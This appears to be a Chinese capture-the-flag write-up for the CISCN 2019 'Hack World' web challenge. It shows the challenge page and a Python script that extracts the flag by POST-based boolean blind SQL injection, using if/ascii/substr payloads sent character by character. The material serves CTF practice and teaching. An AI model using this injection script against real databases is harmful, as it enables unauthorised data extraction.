【CISCN 2019华北Day2】Web1

题目

<!-- saved from url=(0043)http://node4.anna.nssctf.cn:28181/index.php -->
<html><script id="allow-copy_script">(function agent() {
    let unlock = false
    document.addEventListener('allow_copy', (event) => {
      unlock = event.detail.unlock
    })

    const copyEvents = [
      'copy',
      'cut',
      'contextmenu',
      'selectstart',
      'mousedown',
      'mouseup',
      'mousemove',
      'keydown',
      'keypress',
      'keyup',
    ]
    const rejectOtherHandlers = (e) => {
      if (unlock) {
        e.stopPropagation()
        if (e.stopImmediatePropagation) e.stopImmediatePropagation()
      }
    }
    copyEvents.forEach((evt) => {
      document.documentElement.addEventListener(evt, rejectOtherHandlers, {
        capture: true,
      })
    })
  })()</script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hack World</title>
</head>
<body>
<h3>All You Want Is In Table 'flag' and the column is 'flag'</h3>
<h3>Now, just give the id of passage</h3>
<form action="http://node4.anna.nssctf.cn:28181/index.php" method="POST">
<input type="text" name="id">
<input type="submit">
</form>


</body></html>

思路

这是一道POST形式的SQL盲注

EXP

import string
import requests
import time  # 导入时间模块用于添加等待时间

res = ""
url = "http://node4.anna.nssctf.cn:28181/index.php"

for i in range(1, 60):  # 遍历每个字符的位置
    found = False  # 标志位,用于判断是否找到当前字符
    for j in string.printable:  # 遍历所有可打印字符
        sql = 'if(ascii(substr((select(flag)from(flag)),{0},1))={1},1,2)'.format(i, ord(j))
        post = {"id": sql}
        print(f"Trying position {i} with character '{j}'...")  # 显示当前尝试的字符和位置
        result = requests.post(url=url, data=post)
        if 'Hello' in result.text:
            res += j  # 找到正确字符,加入结果
            print(f"Found character at position {i}: '{j}'")  # 显示找到的字符
            print(f"Current flag: {res}")  # 显示当前解密的部分
            found = True
            break  # 跳出内层循环,继续下一个位置
        else:
            continue
    if not found:  # 如果当前位置没有找到任何匹配字符,跳出外层循环
        print(f"No character found at position {i}. Stopping...")
        break
    time.sleep(1)  

print("Final flag:", res)  # 输出最终结果

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值